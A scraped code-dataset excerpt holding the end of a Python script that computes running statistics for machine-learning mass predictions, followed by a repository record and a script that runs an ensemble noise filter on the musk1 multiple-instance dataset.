############
print('1d')
running = runningStatistic(bias, np.log10(d['M200c']),
d['ML_pred_1d'])
#############
#### 2d #####
#############
print('2d')
running = runningStatistic(bias, np.log10(d['M200c']),
d['ML_pred_2d'])
##############
##### 3d #####
##############
print('3d')
running = runningStatistic(bias, np.log10(d['M200c']),
d['ML_pred_3d'])
print '-----'
| [
"stevenboada@gmail.com"
] | stevenboada@gmail.com |
3ff28d2310a0f022eadd873154775534e6ed3f7d | 4936c1d20aef7a93ad2ded2f5731b102631ad8b2 | /Tablas/tablas/Ruido20/maxVotos/EF/menu_1.py | bbbc4a429fa3ea9ad1f3048aeb9cae99d255b9a6 | [
"LicenseRef-scancode-other-permissive"
] | permissive | jcarlosorte/pyMIL-BNF | 530f60081607deecfee7c72264000c0ba34984fe | 36e282e35242815bf57310db98707da70d69b183 | refs/heads/master | 2022-11-12T20:58:49.058513 | 2020-07-06T15:35:01 | 2020-07-06T15:35:01 | 182,646,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,214 | py | # -*- coding: utf-8 -*-
"""
Created on Fri May 10 10:11:00 2019
@author: Usuario
"""
import sys,os,warnings
os.chdir('../../../../MILpy')
sys.path.append(os.path.realpath('..'))
warnings.filterwarnings('ignore')
#from funciones import fvc
from filters import EF
from filters import CVCF
from filters import IPF
folds = 5
votacion = 'maxVotos'
DataSet = ['musk1_scaled']
#ruido = [0,5,10,15,20,25,30]
ruido = [20]
#print('********** Crear dataset con ruido **********')
#fvc.fvc_part(DataSet,folds,ruido)
print('********** Ensemble Filter por '+str(votacion)+'**********')
EF.EF(DataSet,votacion,folds,ruido)
#print('********** CV Committees Filter por '+str(votacion)+'**********')
#CVCF.CVcF(DataSet,votacion,folds,ruido)
#print('********** Iterative Partitioning Filter por '+str(votacion)+'**********')
#IPF.IPF(DataSet,votacion,folds,ruido)
#votacion = 'maxVotos'
#print('********** Ensemble Filter por '+str(votacion)+'**********')
#EF.EF(DataSet,votacion,folds,ruido)
#print('********** CV Committees Filter por '+str(votacion)+'**********')
#CVCF.CVcF(DataSet,votacion,folds,ruido)
#print('********** Iterative Partitioning Filter por '+str(votacion)+'**********')
#IPF.IPF(DataSet,votacion,folds,ruido) | [
"jcarlosorte@ugr.es"
] | jcarlosorte@ugr.es |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.